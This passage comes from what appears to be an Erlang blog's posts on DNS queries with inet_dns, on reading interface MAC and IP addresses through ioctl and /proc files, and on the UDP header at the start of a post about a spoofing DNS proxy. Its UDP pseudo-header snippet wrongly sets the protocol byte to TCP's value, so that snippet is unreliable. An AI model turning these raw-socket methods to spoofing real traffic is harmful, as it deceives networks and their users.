undefined,<span class="Statement">[]</span>,false<span class="Special">}</span>,
<span class="Special">{</span>dns_rr,<span class="Statement">"</span><span class="Constant">listincomprehension.com</span><span class="Statement">"</span>,a,in,<span class="Constant">0</span>,<span class="Constant">656</span>,
<span class="Special">{</span><span class="Constant">216</span>,<span class="Constant">239</span>,<span class="Constant">36</span>,<span class="Constant">21</span><span class="Special">}</span>,
undefined,<span class="Statement">[]</span>,false<span class="Special">}</span>,
<span class="Special">{</span>dns_rr,<span class="Statement">"</span><span class="Constant">listincomprehension.com</span><span class="Statement">"</span>,a,in,<span class="Constant">0</span>,<span class="Constant">656</span>,
<span class="Special">{</span><span class="Constant">216</span>,<span class="Constant">239</span>,<span class="Constant">38</span>,<span class="Constant">21</span><span class="Special">}</span>,
undefined,<span class="Statement">[]</span>,false<span class="Special">}</span><span class="Statement">]</span>,
<span class="Statement">[]</span>,<span class="Statement">[]</span><span class="Special">}}
</span><span class="Constant">2</span><span class="Statement">></span> rr<span class="PreProc">(</span><span class="Statement">"</span><span class="Constant">/usr/local/lib/erlang/lib/kernel-2.14/src/inet_dns.hrl</span><span class="Statement">"</span><span class="PreProc">)</span>.
<span class="Statement">[</span>dns_header,dns_query,dns_rec,dns_rr,dns_rr_opt<span class="Statement">]</span>
<span class="Constant">3</span><span class="Statement">></span> Q.
#dns_rec<span class="Special">{</span>header <span class="Statement">=</span> #dns_header<span class="Special">{</span>id <span class="Statement">=</span> <span class="Constant">7296</span>,qr <span class="Statement">=</span> true,
opcode <span class="Statement">=</span> <span class="Statement">'</span><span class="Constant">query</span><span class="Statement">'</span>,aa <span class="Statement">=</span> false,tc <span class="Statement">=</span> false,rd <span class="Statement">=</span> true,ra <span class="Statement">=</span> true,
pr <span class="Statement">=</span> false,rcode <span class="Statement">=</span> <span class="Constant">0</span><span class="Special">}</span>,
qdlist <span class="Statement">=</span> <span class="Statement">[</span>#dns_query<span class="Special">{</span>domain <span class="Statement">=</span> <span class="Statement">"</span><span class="Constant">listincomprehension.com</span><span class="Statement">"</span>,
type <span class="Statement">=</span> a,class <span class="Statement">=</span> in<span class="Special">}</span><span class="Statement">]</span>,
anlist <span class="Statement">=</span> <span class="Statement">[</span>#dns_rr<span class="Special">{</span>domain <span class="Statement">=</span> <span class="Statement">"</span><span class="Constant">listincomprehension.com</span><span class="Statement">"</span>,
type <span class="Statement">=</span> a,class <span class="Statement">=</span> in,cnt <span class="Statement">=</span> <span class="Constant">0</span>,ttl <span class="Statement">=</span> <span class="Constant">656</span>,
data <span class="Statement">=</span> <span class="Special">{</span><span class="Constant">216</span>,<span class="Constant">239</span>,<span class="Constant">32</span>,<span class="Constant">21</span><span class="Special">}</span>,
tm <span class="Statement">=</span> undefined,bm <span class="Statement">=</span> <span class="Statement">[]</span>,func <span class="Statement">=</span> false<span class="Special">}</span>,
<span class="Comment">#dns_rr{domain = "listincomprehension.com",type = a,</span>
class <span class="Statement">=</span> <span class="Constant">in</span>,cnt <span class="Statement">=</span> <span class="Constant">0</span>,ttl <span class="Statement">=</span> <span class="Constant">656</span>,
data <span class="Statement">=</span> <span class="Special">{</span><span class="Constant">216</span>,<span class="Constant">239</span>,<span class="Constant">34</span>,<span class="Constant">21</span><span class="Special">}</span>,
tm <span class="Statement">=</span> <span class="Constant">undefined</span>,bm <span class="Statement">=</span> <span class="Statement">[]</span>,func <span class="Statement">=</span> <span class="Constant">false</span>},
<span class="Comment">#dns_rr{domain = "listincomprehension.com",type = a,</span>
class <span class="Statement">=</span> <span class="Constant">in</span>,cnt <span class="Statement">=</span> <span class="Constant">0</span>,ttl <span class="Statement">=</span> <span class="Constant">656</span>,
data <span class="Statement">=</span> <span class="Special">{</span><span class="Constant">216</span>,<span class="Constant">239</span>,<span class="Constant">36</span>,<span class="Constant">21</span><span class="Special">}</span>,
tm <span class="Statement">=</span> <span class="Constant">undefined</span>,bm <span class="Statement">=</span> <span class="Statement">[]</span>,func <span class="Statement">=</span> <span class="Constant">false</span>},
<span class="Comment">#dns_rr{domain = "listincomprehension.com",type = a,</span>
class <span class="Statement">=</span> <span class="Constant">in</span>,cnt <span class="Statement">=</span> <span class="Constant">0</span>,ttl <span class="Statement">=</span> <span class="Constant">656</span>,
data <span class="Statement">=</span> <span class="Special">{</span><span class="Constant">216</span>,<span class="Constant">239</span>,<span class="Constant">38</span>,<span class="Constant">21</span><span class="Special">}</span>,
tm <span class="Statement">=</span> <span class="Constant">undefined</span>,bm <span class="Statement">=</span> <span class="Statement">[]</span>,func <span class="Statement">=</span> <span class="Constant">false</span>}<span class="Statement">]</span>,
nslist <span class="Statement">=</span> <span class="Statement">[]</span>,arlist <span class="Statement">=</span> <span class="Statement">[]</span><span class="Special">}</span>
</pre>The records are displayed as tuples. You can pretty print the records by using the shell <em>rr()</em> command to include the header file wherever it is on your system.<br />
<br />
The query returned the same packet we sent with some changes to the header:<br />
<ul><li>The response flag (qr) is set to true<br />
<li>The recursion available flag (ra) is also set to true<br />
</ul>The answer to our query is a list bound to the anlist record atom. The #dns_rr{} record looks like: <pre class="Code"><span class="Type">-record</span>(dns_rr,
{
domain <span class="Statement">=</span> <span class="Constant">""</span>, <span class="Comment">%% resource domain</span>
type <span class="Statement">=</span> any, <span class="Comment">%% resource type</span>
class <span class="Statement">=</span> <span class="Special">in</span>, <span class="Comment">%% reource class</span>
cnt <span class="Statement">=</span> <span class="Constant">0</span>, <span class="Comment">%% access count</span>
ttl <span class="Statement">=</span> <span class="Constant">0</span>, <span class="Comment">%% time to live</span>
data <span class="Statement">=</span> [], <span class="Comment">%% raw data</span>
<span class="Comment">%% </span>
tm, <span class="Comment">%% creation time</span>
bm <span class="Statement">=</span> [], <span class="Comment">%% Bitmap storing domain character case information.</span>
func <span class="Statement">=</span> <span class="Statement">false</span> <span class="Comment">%% Optional function calculating the data field.</span>
})<span class="Special">.</span>
</pre>The data field is interesting. Although it's initialized as an empty list, the data structure bound to it depends on the DNS record type. For example, from the ones I remember: <ul><li>A: tuple representing the IP address<br />
<li>TXT: a list of strings<br />
<li>NULL: a binary<br />
<li>CNAME: a domain name string appropriately "labelled" (canonicalized by the "."'s), e.g., "ghs.google.com". inet_dns takes care of breaking the domain name into the appropriate, compressed domain name -- a weird form where the "."'s are replaced by nulls and each component is prefaced by a length or a pointer redirecting to another field (hence the compression).<br />
</ul><h1>Pattern Matching</h1>The cool thing is that, since the DNS records are nested records, its very easy to pattern match on the results. Modifying the example above: <pre class="Code"><span class="Type">-module</span>(dns1)<span class="Special">.</span>
<span class="Type">-compile</span>(export_all)<span class="Special">.</span>
<span class="Type">-include_lib</span>(<span class="Constant">"kernel/src/inet_dns.hrl"</span>)<span class="Special">.</span>
q(Type, Domain, NS) <span class="Statement">-></span>
Query <span class="Statement">=</span> <span class="Identifier">inet_dns:encode</span>(
#dns_rec{
header <span class="Statement">=</span> #dns_header{
id <span class="Statement">=</span> <span class="Identifier">crypto:rand_uniform</span>(<span class="Constant">1</span>,<span class="Constant">16</span>#<span class="Constant">FFFF</span>),
opcode <span class="Statement">=</span> <span class="Type">'query'</span>,
rd <span class="Statement">=</span> <span class="Statement">true</span>
},
qdlist <span class="Statement">=</span> [#dns_query{
domain <span class="Statement">=</span> Domain,
type <span class="Statement">=</span> Type,
class <span class="Statement">=</span> <span class="Special">in</span>
}]
}),
{ok, Socket} <span class="Statement">=</span> <span class="Identifier">gen_udp:open</span>(<span class="Constant">0</span>, [<span class="Identifier">binary</span>, {active, <span class="Statement">true</span>}]),
<span class="Identifier">gen_udp:send</span>(Socket, NS, <span class="Constant">53</span>, Query),
loop(Socket, Type, Domain, NS)<span class="Special">.</span>
loop(Socket, Type, Domain, NS) <span class="Statement">-></span>
<span class="Statement">receive</span>
{udp, Socket, NS, _, Packet} <span class="Statement">-></span>
{ok, Response} <span class="Statement">=</span> <span class="Identifier">inet_dns:decode</span>(Packet),
match(Type, Domain, Response)
<span class="Statement">end</span><span class="Special">.</span>
match(a, Domain, #dns_rec{
header <span class="Statement">=</span> #dns_header{
qr <span class="Statement">=</span> <span class="Statement">true</span>,
opcode <span class="Statement">=</span> <span class="Type">'query'</span>
},
qdlist <span class="Statement">=</span> [#dns_query{
domain <span class="Statement">=</span> Domain,
type <span class="Statement">=</span> a,
class <span class="Statement">=</span> <span class="Special">in</span>
}],
anlist <span class="Statement">=</span> [#dns_rr{
domain <span class="Statement">=</span> Domain,
type <span class="Statement">=</span> a,
class <span class="Statement">=</span> <span class="Special">in</span>,
data <span class="Statement">=</span> {IP1, IP2, IP3, IP4}
}|_]}) <span class="Statement">-></span>
{a, Domain, {IP1,IP2,IP3,IP4}};
match(cname, Domain, #dns_rec{
header <span class="Statement">=</span> #dns_header{
qr <span class="Statement">=</span> <span class="Statement">true</span>,
opcode <span class="Statement">=</span> <span class="Type">'query'</span>
},
qdlist <span class="Statement">=</span> [#dns_query{
domain <span class="Statement">=</span> Domain,
type <span class="Statement">=</span> cname,
class <span class="Statement">=</span> <span class="Special">in</span>
}],
anlist <span class="Statement">=</span> [#dns_rr{
domain <span class="Statement">=</span> Domain,
type <span class="Statement">=</span> cname,
class <span class="Statement">=</span> <span class="Special">in</span>,
data <span class="Statement">=</span> Data
}|_]}) <span class="Statement">-></span>
{cname, Domain, Data}<span class="Special">.</span>
</pre><br />
And the results:<br />
<br />
$ erl<br />
Erlang R14A (erts-5.8) [source] [smp:2:2] [rq:2] [async-threads:0] [hipe] [kernel-poll:false]<br />
<br />
Eshell V5.8 (abort with ^G)<br />
1> dns1:q(cname, "blog.listincomprehension.com", {8,8,8,8}).<br />
{cname,"blog.listincomprehension.com","ghs.google.com"}Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8577871288924093307.post-92198792069292624282010-07-01T11:20:00.019-04:002011-01-04T15:25:53.639-05:00Fun with Raw Sockets in Erlang: Finding MAC and IP Addresses<em>(See the update for versions of some of these functions in standard Erlang).</em><br />
<p/>When working with PF_PACKET raw sockets, the caller needs to provide the source/destination MAC and IP addresses.<br />
Playing with a <a href="http://blog.listincomprehension.com/2010/06/fun-with-raw-sockets-in-erlang-spoofing.html">spoofing DNS proxy</a>, I got tired of hardcoding the addresses, then WTF'ing every time I switched networks. So I added some functions to <a href="http://github.com/msantos/procket">procket</a> to lookup the system network interface and its MAC and IP addresses.<br />
<br />
<h1>Retrieving the MAC Address of an Interface</h1><br />
Under Linux, getting the MAC address of an interface involves calling an ioctl() with the request set to SIOCGIFHWADDR and passing in a <em>struct ifreq</em>.<br />
<br />
Here is the code to do so in C:<br />
<pre class="Code"><span class="PreProc">#include </span><span class="Constant"><stdio.h></span>
<span class="PreProc">#include </span><span class="Constant"><stdlib.h></span>
<span class="PreProc">#include </span><span class="Constant"><string.h></span>
<span class="PreProc">#include </span><span class="Constant"><unistd.h></span>
<span class="PreProc">#include </span><span class="Constant"><err.h></span>
<span class="PreProc">#include </span><span class="Constant"><sys/types.h></span>
<span class="PreProc">#include </span><span class="Constant"><sys/socket.h></span>
<span class="PreProc">#include </span><span class="Constant"><sys/ioctl.h></span>
<span class="PreProc">#include </span><span class="Constant"><net/if.h></span>
<span class="PreProc">#include </span><span class="Constant"><netinet/ether.h></span>
<span class="Type">int</span>
main(<span class="Type">int</span> argc, <span class="Type">char</span> *argv[])
{
<span class="Type">int</span> s = -<span class="Constant">1</span>;
<span class="Type">struct</span> ifreq ifr = {<span class="Constant">0</span>};
<span class="Type">char</span> *dev = <span class="Constant">NULL</span>;
<span class="Type">struct</span> sockaddr *sa;
dev = strdup((argc == <span class="Constant">2</span> ? argv[<span class="Constant">1</span>] : <span class="Constant">"eth0"</span>));
<span class="Statement">if</span> (dev == <span class="Constant">NULL</span>)
err(<span class="Constant">EXIT_FAILURE</span>, <span class="Constant">"strdup"</span>);
<span class="Statement">if</span> ( (s = socket(AF_INET, SOCK_DGRAM, <span class="Constant">0</span>)) < <span class="Constant">0</span>)
err(<span class="Constant">EXIT_FAILURE</span>, <span class="Constant">"socket"</span>);
(<span class="Type">void</span>)memcpy(ifr.ifr_name, dev, <span class="Statement">sizeof</span>(ifr.ifr_name)-<span class="Constant">1</span>);
<span class="Statement">if</span> (ioctl(s, SIOCGIFHWADDR, &ifr) < <span class="Constant">0</span>)
err(<span class="Constant">EXIT_FAILURE</span>, <span class="Constant">"ioctl"</span>);
sa = (<span class="Type">struct</span> sockaddr *)&ifr.ifr_hwaddr;
(<span class="Type">void</span>)printf(<span class="Constant">"</span><span class="Special">%02x</span><span class="Constant">:</span><span class="Special">%02x</span><span class="Constant">:</span><span class="Special">%02x</span><span class="Constant">:</span><span class="Special">%02x</span><span class="Constant">:</span><span class="Special">%02x</span><span class="Constant">:</span><span class="Special">%02x</span><span class="Special">\n</span><span class="Constant">"</span>,
sa->sa_data[<span class="Constant">0</span>], sa->sa_data[<span class="Constant">1</span>], sa->sa_data[<span class="Constant">2</span>], sa->sa_data[<span class="Constant">3</span>],
sa->sa_data[<span class="Constant">4</span>], sa->sa_data[<span class="Constant">5</span>]);
free(dev);
exit (<span class="Constant">EXIT_SUCCESS</span>);
}
</pre><br />
The equivalent in Erlang uses procket:ioctl/2<br />
<pre class="Code">macaddress(Socket, Dev) <span class="Statement">-></span>
{ok, <span class="Statement"><<</span><span class="Identifier">_Ifname:16</span><span class="Statement">/</span>bytes,
<span class="Special">?PF_INET:</span><span class="Constant">16</span>, <span class="Comment">% family</span>
SM1,SM2,SM3,SM4,SM5,SM6, <span class="Comment">% mac address</span>
_<span class="Statement">/</span><span class="Identifier">binary</span><span class="Statement">>></span>} <span class="Statement">=</span> <span class="Identifier">procket:ioctl</span>(Socket,
?SIOCGIFHWADDR,
<span class="Identifier">list_to_binary</span>([
Dev, <span class="Statement"><<</span><span class="Constant">0</span><span class="Special">:</span>((<span class="Constant">15</span><span class="Statement">*</span><span class="Constant">8</span>) <span class="Statement">-</span> (<span class="Identifier">length</span>(Dev)<span class="Statement">*</span><span class="Constant">8</span>)), <span class="Identifier">0:8</span>, <span class="Identifier">0:128</span><span class="Statement">>></span>
])),
{SM1,SM2,SM3,SM4,SM5,SM6}<span class="Special">.</span>
</pre>Results may differ depending on the endian-ness of your platform.<br />
<br />
<h1>Retrieving the IP Address of an Interface</h1><br />
The IP address of an interface can be obtained by another ioctl() with a request value of SIOCGIFADDR. In C:<br />
<pre class="Code"><span class="PreProc">#include </span><span class="Constant"><stdio.h></span>
<span class="PreProc">#include </span><span class="Constant"><stdlib.h></span>
<span class="PreProc">#include </span><span class="Constant"><string.h></span>
<span class="PreProc">#include </span><span class="Constant"><unistd.h></span>
<span class="PreProc">#include </span><span class="Constant"><err.h></span>
<span class="PreProc">#include </span><span class="Constant"><sys/types.h></span>
<span class="PreProc">#include </span><span class="Constant"><sys/socket.h></span>
<span class="PreProc">#include </span><span class="Constant"><sys/ioctl.h></span>
<span class="PreProc">#include </span><span class="Constant"><netinet/in.h></span>
<span class="PreProc">#include </span><span class="Constant"><arpa/inet.h></span>
<span class="PreProc">#include </span><span class="Constant"><net/if.h></span>
<span class="Type">int</span>
main(<span class="Type">int</span> argc, <span class="Type">char</span> *argv[])
{
<span class="Type">int</span> s = -<span class="Constant">1</span>;
<span class="Type">struct</span> ifreq ifr = {<span class="Constant">0</span>};
<span class="Type">char</span> *dev = <span class="Constant">NULL</span>;
<span class="Type">struct</span> sockaddr_in *sa;
dev = strdup((argc == <span class="Constant">2</span> ? argv[<span class="Constant">1</span>] : <span class="Constant">"eth0"</span>));
<span class="Statement">if</span> (dev == <span class="Constant">NULL</span>)
err(<span class="Constant">EXIT_FAILURE</span>, <span class="Constant">"strdup"</span>);
<span class="Statement">if</span> ( (s = socket(AF_INET, SOCK_DGRAM, <span class="Constant">0</span>)) < <span class="Constant">0</span>)
err(<span class="Constant">EXIT_FAILURE</span>, <span class="Constant">"socket"</span>);
(<span class="Type">void</span>)memcpy(ifr.ifr_name, dev, <span class="Statement">sizeof</span>(ifr.ifr_name)-<span class="Constant">1</span>);
ifr.ifr_addr.sa_family = PF_INET;
<span class="Statement">if</span> (ioctl(s, SIOCGIFADDR, &ifr) < <span class="Constant">0</span>)
err(<span class="Constant">EXIT_FAILURE</span>, <span class="Constant">"ioctl"</span>);
sa = (<span class="Type">struct</span> sockaddr_in *)&ifr.ifr_hwaddr;
(<span class="Type">void</span>)printf(<span class="Constant">"</span><span class="Special">%s</span><span class="Special">\n</span><span class="Constant">"</span>, inet_ntoa(sa->sin_addr));
free(dev);
exit (<span class="Constant">EXIT_SUCCESS</span>);
}
</pre><br />
And the Erlang version:<br />
<pre class="Code">ipv4address(Socket, Dev) <span class="Statement">-></span>
{ok, <span class="Statement"><<</span><span class="Identifier">_Ifname:16</span><span class="Statement">/</span>bytes,
?<span class="Identifier">PF_INET:16</span><span class="Statement">/</span>native, <span class="Comment">% sin_family</span>
<span class="Identifier">_:16</span>, <span class="Comment">% sin_port </span>
SA1,SA2,SA3,SA4, <span class="Comment">% sin_addr</span>
_<span class="Statement">/</span><span class="Identifier">binary</span><span class="Statement">>></span>} <span class="Statement">=</span> <span class="Identifier">procket:ioctl</span>(Socket,
?SIOCGIFADDR,
<span class="Identifier">list_to_binary</span>([
Dev, <span class="Statement"><<</span><span class="Constant">0</span><span class="Special">:</span>((<span class="Constant">15</span><span class="Statement">*</span><span class="Constant">8</span>) <span class="Statement">-</span> (<span class="Identifier">length</span>(Dev)<span class="Statement">*</span><span class="Constant">8</span>)), <span class="Identifier">0:8</span><span class="Statement">>></span>,
<span class="Statement"><<</span>?<span class="Identifier">PF_INET:16</span><span class="Statement">/</span>native, <span class="Comment">% family</span>
<span class="Identifier">0:112</span><span class="Statement">>></span>
])),
{SA1,SA2,SA3,SA4}<span class="Special">.</span>
</pre><br />
<h1>Looking Up an IP Address in the ARP Cache</h1><br />
ARP cache lookups can be done by using:<br />
<pre class="Code">ioctl(socket, SIOCGARP, <span class="Type">struct</span> arpreq);
</pre>But utilities on Linux just seem to parse <em>/proc/net/arp</em>:<br />
<pre class="Code">arplookup({IP1,IP2,IP3,IP4}) <span class="Statement">-></span>
{ok, FD} <span class="Statement">=</span> <span class="Identifier">file:open</span>(<span class="Constant">"/proc/net/arp"</span>, [read,raw]),
arploop(FD, <span class="Identifier">inet_parse:ntoa</span>({IP1,IP2,IP3,IP4}))<span class="Special">.</span>
arploop(FD, Address) <span class="Statement">-></span>
<span class="Statement">case</span> <span class="Identifier">file:read_line</span>(FD) <span class="Statement">of</span>
eof <span class="Statement">-></span>
<span class="Identifier">file:close</span>(FD),
not_found;
{ok, Line} <span class="Statement">-></span>
<span class="Statement">case</span> <span class="Identifier">lists:prefix</span>(Address, Line) <span class="Statement">of</span>
<span class="Statement">true</span> <span class="Statement">-></span>
<span class="Identifier">file:close</span>(FD),
M <span class="Statement">=</span> <span class="Identifier">string:tokens</span>(
<span class="Identifier">lists:nth</span>(?HWADDR_OFF, <span class="Identifier">string:tokens</span>(Line, <span class="Constant">" </span><span class="Special">\n</span><span class="Constant">"</span>)), <span class="Constant">":"</span>),
<span class="Identifier">list_to_tuple</span>([ <span class="Identifier">erlang:list_to_integer</span>(E, <span class="Constant">16</span>) || E <span class="Statement"><-</span> M ]);
<span class="Statement">false</span> <span class="Statement">-></span> arploop(FD, Address)
<span class="Statement">end</span>
<span class="Statement">end</span><span class="Special">.</span>
</pre><br />
<h1>Getting a List of Interfaces</h1><br />
To get the list of interfaces on a system, yet another ioctl() is used, this time passing in SIOCGIFCONF and this structure as arguments:<br />
<pre class="Code"><span class="Type">struct</span> ifconf
{
<span class="Type">int</span> ifc_len; <span class="Comment">/*</span><span class="Comment"> Size of buffer. </span><span class="Comment">*/</span>
<span class="Type">union</span>
{
__caddr_t ifcu_buf;
<span class="Type">struct</span> ifreq *ifcu_req;
} ifc_ifcu;
};
</pre><a href="http://www.doctort.org/adam/nerd-notes/enumerating-network-interfaces-on-linux.html">Here</a> is an example of retrieving the interface list in C.<br />
<p/>The ioctl() takes, as an argument, a structure using a length and a pointer to a buffer. procket doesn't have a way of allocating a piece of memory though it could be modified to have an NIF that allocates a binary and returns the address of the binary as an integer. Functions could then pass in the memory address but a buggy piece of Erlang code might pass in the wrong value and crash the VM. (<b>Edit</b>: The erl_nif interface in Erlang R14A supports safely passing a reference to a block of memory between functions using <a href="http://www.erlang.org/doc/man/erl_nif.html#enif_alloc_resource">enif_alloc_resource()</a> to create a "Resource Object".)<br />
<p/>Instead, I simply parse the output of <em>/proc/net/dev</em>. For example, here is the output on my laptop:<br />
<pre class="Code">$ cat /proc/net/dev
Inter-| Receive | Transmit
face |bytes packets errs drop fifo frame compressed multicast|bytes packets errs drop fifo colls carrier compressed
lo: <span class="Constant">526441</span> <span class="Constant">3620</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">526441</span> <span class="Constant">3620</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span>
eth0: <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span>
wifi0:<span class="Constant">10960093</span> <span class="Constant">26897</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">1578</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">734661</span> <span class="Constant">4876</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span>
ath0:<span class="Constant">14422892</span> <span class="Constant">12536</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">576599</span> <span class="Constant">4706</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span>
</pre>Even nastier than the arp cache lookup, since I resorted to using regular expressions.<br />
<pre class="Code">iflist() <span class="Statement">-></span>
{ok, FD} <span class="Statement">=</span> <span class="Identifier">file:open</span>(<span class="Constant">"/proc/net/dev"</span>, [raw, read]),
iflistloop(FD, [])<span class="Special">.</span>
iflistloop(FD, Ifs) <span class="Statement">-></span>
<span class="Statement">case</span> <span class="Identifier">file:read_line</span>(FD) <span class="Statement">of</span>
eof <span class="Statement">-></span>
<span class="Identifier">file:close</span>(FD),
Ifs;
{ok, Line} <span class="Statement">-></span>
iflistloop(FD, iflistmatch(Line, Ifs))
<span class="Statement">end</span><span class="Special">.</span>
iflistmatch(Data, Ifs) <span class="Statement">-></span>
<span class="Statement">case</span> <span class="Identifier">re:run</span>(Data, <span class="Constant">"^</span><span class="Special">\\</span><span class="Constant">s*([a-z]+[0-9]+):"</span>, [{capture, [<span class="Constant">1</span>], <span class="Identifier">list</span>}]) <span class="Statement">of</span>
nomatch <span class="Statement">-></span> Ifs;
{match, [If]} <span class="Statement">-></span> [If|Ifs]
<span class="Statement">end</span><span class="Special">.</span>
</pre><br />
<h1>Finding the Default Interface</h1><br />
In <a href="http://github.com/msantos/spood">spood</a>, I took the easy way and just sort of guessed. A proper solution would check the routing table. Instead I look for the first interface without a local IP address:<br />
<pre class="Code">device() <span class="Statement">-></span>
{ok, S} <span class="Statement">=</span> <span class="Identifier">procket:listen</span>(<span class="Constant">0</span>, [{protocol, udp}, {family, inet}, {type, dgram}]),
[Dev|_] <span class="Statement">=</span> [ If || If <span class="Statement"><-</span> <span class="Identifier">packet:iflist</span>(), ipcheck(S, If) ],
<span class="Identifier">procket:close</span>(S),
Dev<span class="Special">.</span>
ipcheck(S, If) <span class="Statement">-></span>
<span class="Statement">try</span> <span class="Identifier">packet:ipv4address</span>(S, If) <span class="Statement">of</span>
{<span class="Constant">127</span>,_,_,_} <span class="Statement">-></span> <span class="Statement">false</span>;
{<span class="Constant">169</span>,_,_,_} <span class="Statement">-></span> <span class="Statement">false</span>;
_ <span class="Statement">-></span> <span class="Statement">true</span>
<span class="Statement">catch</span>
<span class="Identifier">error:_</span> <span class="Statement">-></span> <span class="Statement">false</span>
<span class="Statement">end</span><span class="Special">.</span>
</pre><br />
<h1>Update: Using the inet Module</h1>After having gone through all the above, I discovered that the <a href="http://www.erlang.org/doc/man/inet.html">inet</a> module, which is part of the Erlang standard library, is able to retrieve information about the local interfaces.<br />
<br />
<em>inet</em> has 2 functions:<br />
<ul><li>getiflist/0: retrieve a list of all the local interfaces, e.g., {ok, ["eth0", "eth1"]}<br />
<li>ifget/2: retrieve interface attributes. The arguments can be:<br />
<ul><li>addr: IP address of interface<br />
<li>hwaddr: the MAC address of the interface. Works on Linux, doesn't work on Mac OS X (returns an empty list).<br />
(<b>Update</b>: I've <a href="http://www.erlang.org/cgi-bin/ezmlm-cgi?3:mss:1267:201007:aekkbmabalbndomebiol">submitted a patch</a> to get the MAC address on Mac OS X)<br />
<li>dstaddr<br />
<li>netmask<br />
<li>broadcast<br />
<li>mtu<br />
<li>flags: returns the interface status, e.g., [up, broadcast, running, multicast]<br />
</ul></ul><br />
For example:<br />
<ul><li>To get a list of interfaces:<br />
<pre class="Code"><span class="Constant">1</span><span class="Statement">></span> <span class="Identifier">inet:getiflist</span>()<span class="Special">.</span>
{ok,[<span class="Constant">"lo"</span>,<span class="Constant">"eth0"</span>,<span class="Constant">"eth1"</span>]}
</pre><li>To retrieve the IP and MAC addresses of an interface:<br />
<pre class="Code"><span class="Constant">3</span><span class="Statement">></span> <span class="Identifier">inet:ifget</span>(<span class="Constant">"eth0"</span>, [addr, hwaddr])<span class="Special">.</span>
{ok,[{addr,{<span class="Constant">192</span>,<span class="Constant">168</span>,<span class="Constant">1</span>,<span class="Constant">11</span>}},{hwaddr,[<span class="Constant">0</span>,<span class="Constant">11</span>,<span class="Constant">22</span>,<span class="Constant">33</span>,<span class="Constant">44</span>,<span class="Constant">55</span>]}]}
</pre></ul>
<h1>Update2: Using inet:getifaddrs/0</h1>
As of R14B01, Erlang has a supported, cross-platform method for retrieving interface attributes. The functions returns a list holding the interface information. For example:
<pre>1> inet:getifaddrs().
{ok,[{"lo",
[{flags,[up,loopback,running]},
{hwaddr,[0,0,0,0,0,0]},
{addr,{127,0,0,1}},
{netmask,{255,0,0,0}},
{addr,{0,0,0,0,0,0,0,1}},
{netmask,{65535,65535,65535,65535,65535,65535,65535,
65535}}]}]
</pre>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8577871288924093307.post-52381242428181008842010-06-24T22:04:00.010-04:002010-09-07T17:18:49.050-04:00Fun with Raw Sockets in Erlang: A Spoofing DNS Proxy<h1>UDP Header</h1><a href="http://www.faqs.org/rfcs/rfc768.html">UDP headers</a> are specified as:<br />
<div><ul class="Message"><li class="Message">Source Port:16</li>
<li class="Message">Destination Port:16</li>
<li class="Message">Length:16</li>
<li class="Message">Checksum:16</li>
</ul></div><br />
<ul><li>The <em>Source Port</em> is a 2 byte value representing the originating port <br />
<li>The <em>Destination Port</em> is the 2 byte value specifying the target port<br />
<li>The <em>Length</em> is the size of the UDP header and packet in bytes. The size of the UDP header is 8 bytes.<br />
<li>The <em>Checksum</em> algorithm is <a href="http://blog.listincomprehension.com/2010/06/fun-with-raw-sockets-in-erlang-abusing.html">the same as for TCP</a>, involving the creation of an IP pseuduoheader.<br />
If the length of the UDP packet is an odd number of bytes, the packet is zero padded with an additional byte only for checksumming purposes.<br />
</ul>The equivalent UDP header in Erlang is: <pre class="Code"><span class="Statement"><<</span><span class="Identifier">SourcePort:16</span>,
<span class="Identifier">DestinationPort:16</span>,
<span class="Identifier">Length:16</span>,
<span class="Identifier">Checksum:16</span><span class="Statement">>></span>
</pre>The pseudo-header used for checksumming is: <div><ul class="Message"><li class="Message">Source Address:32</li>
<li class="Message">Destination Address:32</li>
<li class="Message">Zero:8</li>
<li class="Message">Protocol:8</li>
<li class="Message">UDP Packet Length:16</li>
<li class="Message">UDP Header and Payload1:8</li>
<li class="Message">...</li>
<li class="Message">UDP Header and PayloadN:8</li>
<li class="Message">optional padding:8</li>
</ul></div><ul><li>The <em>Source Address</em> from the IP header<br />
<li>The <em>Destination Address</em> from the IP header<br />
<li>The <em>Protocol</em> for UDP is 17<br />
<li>The <em>UDP Packet Length</em> in bytes, for both the UDP header and payload. The length of the IP pseudo-header is not included.<br />
<li>The <em>UDP Header and Payload</em> is the full UDP packet<br />
<li>If the UDP packet length is odd, an additional zero'ed byte is included for checksumming purposes. The extra byte is not used in the length computation or sent with the packet.<br />
<li>The length of the UDP packet is included in both the IP pseudo-header and the UDP header.<br />
<li>The checksum field of the UDP header is set to 0.<br />
</ul>In Erlang, the pseudo-header is represented as: <pre class="Code"><span class="Statement"><<</span><span class="Identifier">SA1:8</span>,<span class="Identifier">SA2:8</span>,<span class="Identifier">SA3:8</span>,<span class="Identifier">SA4:8</span>, <span class="Comment">% bytes representing the IP source address</span>
<span class="Identifier">DA1:8</span>,<span class="Identifier">DA2:8</span>,<span class="Identifier">DA3:8</span>,<span class="Identifier">DA4:8</span>, <span class="Comment">% bytes representing the IP destination address</span>
<span class="Identifier">0:8</span>, <span class="Comment">% Zero</span>
<span class="Identifier">6:8</span>, <span class="Comment">% Protocol: TCP</span>
<span class="Identifier">UDPlen:16</span> <span class="Comment">% UDP packet size in bytes</span>
<span class="Identifier">SourcePort:16</span>,
<span class="Identifier">DestinationPort:16</span>,
<span class="Identifier">UDPlen:16</span>,
